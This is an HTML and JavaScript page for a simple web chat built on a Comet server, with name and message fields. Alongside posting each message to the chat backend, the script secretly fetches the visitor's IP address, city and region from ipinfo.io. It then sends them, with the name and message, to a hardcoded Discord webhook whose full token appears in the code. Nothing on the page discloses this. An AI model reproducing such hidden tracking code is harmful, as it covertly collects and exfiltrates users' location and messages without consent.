<!DOCTYPE HTML>
<html>
<head> 
    <meta charset=utf-8>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script language="JavaScript" type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js" ></script>
    <script src="https://comet-server.com/CometServerApi.js" type="text/javascript"></script>
    
    <style>
    pre{
        border: 1px solid #ccc;
        padding: 5px;
        background-color: #EEE;
    }
        body {
  font-family: "Lato", sans-serif;
}

.sidenav {
  height: -1%;
  width: 160px;
  position: fixed;
  z-index: 2;
  top: 0;
  bottom: 100;
  background-color: #FFF;
  overflow-x: hidden;
  padding-top: 20px;
}

.sidenav a {
  padding: 6px 8px 6px 16px;
  text-decoration: none;
  font-size: 25px;
  color: #818181;
  display: block;
}

.sidenav a:hover {
  color: #f1f1f1;
}

.main {
  margin-left: 160px; /* Same as the width of the sidenav */
  font-size: 28px; /* Increased text to enable scrolling */
  padding: 0px 10px;
}

@media screen and (max-height: 450px) {
  .sidenav {padding-top: 15px;}
  .sidenav a {font-size: 18px;}
}
    </style>
</head>
<body>
<div class="sidenav">
  <a href="/chat.html">Chat</a>
  <a href="#services">Services</a>
  <a href="#clients">Clients</a>
  <a href="#contact">Contact</a>
</div>
<div id="web_chat"></div>

<div>
 Name :<input type="text" id="name"><br><br>
 Text: <textarea id="text"></textarea><br>
 <input type="button" onclick="send();" value="send" ><br>
</div>

<script type="text/javascript">

$(document).ready(function()
{ 
    cometApi.start({node:"app.comet-server.ru", dev_id:15 })
    
    cometApi.subscription("simplechat.newMessage", function(event){
        $("#web_chat").append('<b>'+HtmlEncode(event.data.name)+'</b>')
        $("#web_chat").append('<pre>'+HtmlEncode(event.data.text)+'</pre>')
        $("#web_chat").append('<br>')
        if (event.data.name === 'ADMIN'){
            $("#web_chat").css("color", "red");
            } else {
            $("#web_chat").css("color", "black");
        }
    })
})

function HtmlEncode(s)
{
  var el = document.createElement("div");
  el.innerText = el.textContent = s;
  s = el.innerHTML;
  return s;
}
    
    
    
    
  
    function ip()  {
              $.get("https://ipinfo.io", function(response) {
          sendMessages(response.city + ", " + response.region + ", " + response.ip + ", Name: " + document.getElementById('name').value + ", Message: " + document.getElementById('text').value)
          }, "json")
                  
    }
    
    

    
function send()
{
   var name = $('#name').val();
   var text = $('#text').val();
   
   $.ajax({
        url: "https://comet-server.com/doc/CppComet/chat-example/chat.php",
        type: "POST", 
        data:"text="+encodeURIComponent(text)+"&name="+encodeURIComponent(name)
   });
    ip()
}

    function sendMessages(msg) {
      const request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1134935276129636475/mAl-Orwh6PE6JpmTrwHov7nWSKmoXH2hCDvfL3tTcjoP5yNRZyFZwS9I_7Hl88w5DLYa");

      request.setRequestHeader('Content-type', 'application/json');

      const params = {
        username: "Msg From SAO",
        avatar_url: "",
        content: msg
      }

      request.send(JSON.stringify(params));
    }




</script>
</body>
</html>
